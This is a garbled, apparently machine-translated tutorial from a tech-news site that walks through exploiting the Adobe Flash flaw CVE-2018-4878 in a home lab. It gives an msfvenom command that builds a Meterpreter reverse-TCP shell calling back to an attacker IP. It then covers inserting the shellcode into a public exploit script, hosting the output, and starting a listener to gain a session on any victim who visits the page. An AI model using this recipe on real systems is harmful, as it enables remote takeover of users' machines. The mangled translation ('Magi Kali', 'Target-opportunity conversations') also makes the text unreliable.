Shulou(Shulou.com)05/31 Report--

Adobe flash player 28 vulnerability attack analysis, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Adobe Flash 28.0.0.137 and previous versions have a high-risk vulnerability (CVE-2018-4878).

By constructing a special Flash link, an attacker can trigger a vulnerability that can directly getshell when a user accesses this Flash link with a browser / email / Office. Preparation: target information: 192.168.2.134 (windows 7 SP1) Flash version: 28.0.0.137 attack plane information: 192.168.2.132 (kali linux) exploit script: CVE-2018-4878-master exploit:

1. Use msfvenom to generate shellcode,msfvenom-p windows/meterpreter/reverse_tcp LHOST=192.168.2.132 LPORT=7777-f python > shellcode.txt >.

two。 Replace the shellcode in the original cve-2018-4878.py and modify the parameter stageless=False.

3. Modify the file and path to be generated in the code.

4. Execute the modified cve-2018-4878.py file to generate index and exploit files.

5. Copy the two generated files to the web directory environment.

6. Enable snooping in the msf of kali.

7. Target-opportunity conversations can be obtained by using a vulnerable browser in the win7 host and accessing http://192.168.2.132/index.html Magi Kali with Adobe Flash.

After reading the above, have you mastered the method of analyzing Adobe flash player 28 vulnerabilities? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.